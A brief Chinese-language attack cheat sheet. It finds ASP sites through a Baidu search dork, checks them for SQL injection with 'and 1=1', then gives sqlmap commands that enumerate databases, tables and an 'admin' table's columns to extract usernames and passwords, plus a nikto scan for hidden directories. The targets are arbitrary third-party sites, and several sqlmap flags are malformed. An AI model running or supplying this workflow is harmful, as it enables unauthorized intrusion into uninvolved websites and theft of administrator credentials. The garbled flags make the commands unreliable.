百度 ** inurl:asp?id= 找到如 www.abc.asp?id=1
简单判断是否有漏 www.abc.asp?id=1, www.abc.asp?id=1 and 1=1
kali 查看所有的数据库 sqlmap -u www.abc.asp?id=1 -- dbs -current-user
是否有漏洞会有相应信息
查看所有的表 sqlmap -u www.abc.asp?id=1 -dbms mysql -D 数据库名称 --tables (-D 数据库名称 可不加,显示所有的数据库)
查看指定表的列 sqlmap -u www.abc.asp?id=1 -dbms mysql -D 数据库名称 -T admin --columns
查看指定内容 sqlmap -u www.abc.asp?id=1 -dbms mysql -D 数据库名称 -T admin -C user,pwd
nikto查询页面隐藏的目录 nikto -host www.abc.com